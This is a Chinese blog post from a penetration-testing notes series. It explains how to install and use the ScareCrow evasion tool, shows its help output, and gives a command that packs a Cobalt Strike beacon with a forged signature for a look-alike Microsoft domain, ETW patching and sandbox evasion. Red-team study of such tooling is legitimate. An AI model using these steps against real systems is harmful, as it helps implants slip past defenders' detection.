【渗透测试笔记】之【免杀工具——ScareCrow】

项目地址

https://github.com/optiv/ScareCrow

安装方法

  1. 首先安装:golang、openssl、osslsigncode、mingw-w64
apt install golang openssl osslsigncode mingw-w64 -y
  1. 下载源码:https://github.com/optiv/ScareCrow/tags
  2. 进入根目录编译
go env -w GOPROXY=https://goproxy.cn
# 使用国内原
go build ScareCrow.go
# 编译
  1. 查看帮助
./ScareCrow -h
 
  _________                           _________                       
 /   _____/ ____ _____ _______   ____ \_   ___ \_______  ______  _  __
 \_____  \_/ ___\\__  \\_  __ \_/ __ \/    \  \/\_  __ \/  _ \ \/ \/ /
 /        \  \___ / __ \|  | \/\  ___/\     \____|  | \(  <_> )     / 
/_______  /\___  >____  /__|    \___  >\______  /|__|   \____/ \/\_/  
	\/     \/     \/            \/        \/                      
							(@Tyl0us)
	“Fear, you must understand is more than a mere obstacle. 
	Fear is a TEACHER. the first one you ever had.”
	
Usage of ./ScareCrow:
  -I string
    	Path to the raw 64-bit shellcode.
  -Loader string
    	Sets the type of process that will sideload the malicious payload:
    	[*] binary - Generates a binary based payload. (This type does not benfit from any sideloading)	
    	[*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified a JScript loader will be generated.
    	[*] dll - Generates just a DLL file. Can executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions.
    	[*] excel - Loads into a hidden Excel process using a JScript loader.
    	[*] msiexec - Loads into MSIexec process using a JScript loader.
    	[*] wscript - Loads into WScript process using a JScript loader.
    	 (default "binary")
  -O string
    	Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required.
  -configfile string
    	The path to a json based configuration file to generate custom file attributes. This will not use the the default ones.
  -console
    	Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.
  -delivery string
    	Generates a one-liner command to download and execute the payload remotely:
    	[*] bits - Generates a Bitsadmin one liner command to download, execute and remove the loader (Compatible with Binary, Control, Excel and Wscript Loaders).
    	[*] hta - Generates a blank hta file containing the loader along with a MSHTA command execute the loader remotely in the background (Compatible with Control and Excel Loaders). 
    	[*] macro - Generates an office macro that will download and execute the loader remotely (Compatible with Control, Excel and Wscript Loaders)
  -domain string
    	The domain name to use for creating a fake code signing cert. (e.g. www.acme.com) 
  -etw
    	Enables ETW patching to prevent ETW events from being generated
  -injection string
    	Enables Process Injection Mode and specify the path to the process to create/inject into (use \ for the path).
  -password string
    	The password for code signing cert. Required when -valid is used.
  -sandbox
    	Enables sandbox evasion using IsDomainedJoined calls.
  -unmodified
    	When enabled will generate a DLL loader that WILL NOT removing the EDR hooks in system DLLs and only use custom syscalls (set to false by default)
  -url string
    	URL associated with the Delivery option to retrieve the payload. (e.g. https://acme.com/)
  -valid string
    	The path to a valid code signing cert. Used instead -domain if a valid code signing cert is desired.

基本用法

使用cs生成64位raw类型payload:
在这里插入图片描述

生成命令:

./ScareCrow -I beacon.bin -domain www.microft.com -etw -sandbox
# -I:指定raw文件
# -domain:伪造签名域名
# -etw:防止ETW事件生成
# -sandbox:反沙箱

上线测试:
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值